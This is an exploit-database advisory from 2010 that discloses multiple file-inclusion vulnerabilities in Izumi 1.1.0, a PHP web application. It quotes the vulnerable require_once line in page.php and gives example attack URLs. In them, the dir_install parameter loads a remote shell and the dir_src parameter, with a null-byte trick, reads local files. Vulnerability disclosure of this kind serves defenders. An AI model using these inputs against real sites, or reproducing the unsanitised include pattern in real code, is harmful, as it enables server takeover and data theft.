Izumi 1.1.0 - Multiple Local File Inclusion / Remote File Inclusions

EDB-ID:

11415

CVE:

N/A


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2010-02-12


##################################################################
[+] Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://sourceforge.net/projects/izumi/files/
##################################################################

[+] Code :

##################################################################
[page.php]

require_once($dir_install . $dir_src . "common.php");
##################################################################

[+] Example :

##################################################################
[x] RFI :

  [Izumi_path]/src/page.php?dir_install=[Shell]

[x] LFI :

  [Izumi_path]/src/page.php?dir_src=[LFI%00]


[+] GreetZ : s3luruh 4n4k n4k4l j4l4n4n g0r0nt4l0    


[+] Note : Brb ngakak dolo. Wkwkwkwkwkwkwk
##################################################################